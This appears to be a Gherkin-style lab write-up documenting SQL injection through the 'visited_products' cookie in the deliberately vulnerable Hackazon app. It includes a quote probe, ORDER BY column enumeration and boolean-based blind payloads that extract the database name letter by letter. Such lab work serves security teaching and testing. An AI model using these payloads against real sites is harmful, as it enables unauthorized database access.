# language: en

Feature: SQL Injection - Cookies
  From the Hackazon system
  Of the category A1: Injection
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /
    Message: Hackazon
    Details:
      - The cookie that stores the visited products
      - A list of products related to those visited
    Objective: Verify the SQLi vulnerability existence
    """

  Scenario: Basic testing
    Given I have seen some products from the home page
    And the 'visited_products' cookie has been updated
    """
    Name              Value
    visited_products  %2C1%2C2%2C3%2C
    """
    Given the results, I can assume that is an integer type list injection
    """
    SELECT ? FROM ? WHERE id IN (visited_products)
    """
    When I delete and recreate the cookie with a single quote as the value
    """
    # Safari - Quick Console
    document.cookie='visited_products=%27';
    # Reload and watch the results
    503 Service Temporarily Unavailable
    """
    Then it shows me an 503 status code but no information about the error
    Given I want to know the number of columns returned by the data base
    When I use the query '1) ORDER BY N # ' (URL encoded) where N starts from 1
    Then it goes up to 28 where it shows me an 503 HTTP status code
    But the number of columns is useless since the query appears to be nested
    Given now I want to know the if the first letter of the database is H or h
    When I use Boolean-based injections to check if is H (72) or h (104)
    """
    # Fail
    Input:  1) AND ASCII(SUBSTRING(DATABASE(),1,1)) = 72 #
    Output: It doesn't show the related to visited list

    # Success
    Input:  1) AND ASCII(SUBSTRING(DATABASE(),1,1)) = 104 #
    Output: Shows me the product list related to those visited
    """
    And with this tests I can assure that the web page is SQLi vulnerable
